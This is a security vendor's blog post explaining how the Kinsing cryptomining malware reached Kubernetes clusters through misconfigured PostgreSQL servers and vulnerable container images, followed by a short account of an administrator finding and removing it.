Kubernetes Clusters Hacked:
What You Need To Know

Learn about PurpleSec’s fully managed vulnerability management services.

Author: Eva Georgieva / Last Updated: 01/13/2022

Reviewed By: Dalibor Gašić

View Our: Editorial Process

Table Of Contents

What Happened?
- What Is Kinsing?
The Anatomy Of The Attack
Why Kinsing Malware?
Kinsing On PostgreSQL: Case Study
How Can This Attack Be Prevented?

Summary Of The Attack

Kinsing malware targeting Kubernetes Clusters.
Two paths of exploitation utilized: vulnerable images and misconfigured PostgreSQL servers.
The why of the attack is crypto mining and generating revenue.
Securing Kubernetes clusters is a tedious job that has to be done.

What Happened?

In order to get early access to Kubernetes setups, the threat actors behind the Kinsing Crypto Jacking operation have been seen taking advantage of unprotected and improperly configured PostgreSQL servers.

What Is Kinsing?

Kinsing is malware written in Golang, which is a high level programming language used for creating cloud native applications.

It is compiled using the Go 1.13.6 version.

This malware generally targets Linux environments mainly for cryptocurrency mining. Once installed on the victim’s environment and starts successfully running on the target, the goal becomes invading other PCs.

The Anatomy Of The Attack

The security researchers at Microsoft analyzed the attack and identified two attack paths were used.

The first attack path is establishing and enumerating the PostgreSQL servers that had configuration issues.

From there one of the most common misconfigurations that were being exploited is the “trust authentication” setting which allows PostgreSQL to make an assumption that any connection that is established towards the server is authorized to get database access.

In addition, if a security issue exists such that a broad range of IP addresses are being assigned then any IP address that the attacker may be using can be used to gain access to the server.

The second attack path is trying to exploit a security flaw in container images.

In this particular scenario, the attackers are searching for a remote code execution vulnerability which will then allow them to push their payload and gain access to the server in that manner.

From what has been seen so far, the attackers are trying to find and exploit security flaws in these applications:

WordPress
Liferay
PHPUnit
Oracle WebLogic

Why Kinsing Malware?

The Kinsing malware already has a well full archive of exploiting containerized environments to mine cryptocurrencies. The main goal is to generate revenue for the threat actors by exploiting the victim server’s hardware resources.

Kinsing On PostgreSQL: Case Study

When researching this topic Sreeram Venkitesh came to mind. He elaborated on how he detected Kinsing and what he did to remove it from the server.

The lessons learned start with the indicators of compromise being suddenly shut down off the PostgreSQL database. Without any particular reason, the CPU cores were at 100% usage, and suddenly he couldn’t access the PostgreSQL.

The next step was process review where he detected Kinsing as a name of a process, but figured out that it can’t be removed as it adds a cron job for self-replication.

The last part involved finding all processes and deleting them from the /tmp directory as well as deleting the cron jobs running.

This represents a case of successful Kinsing remediation.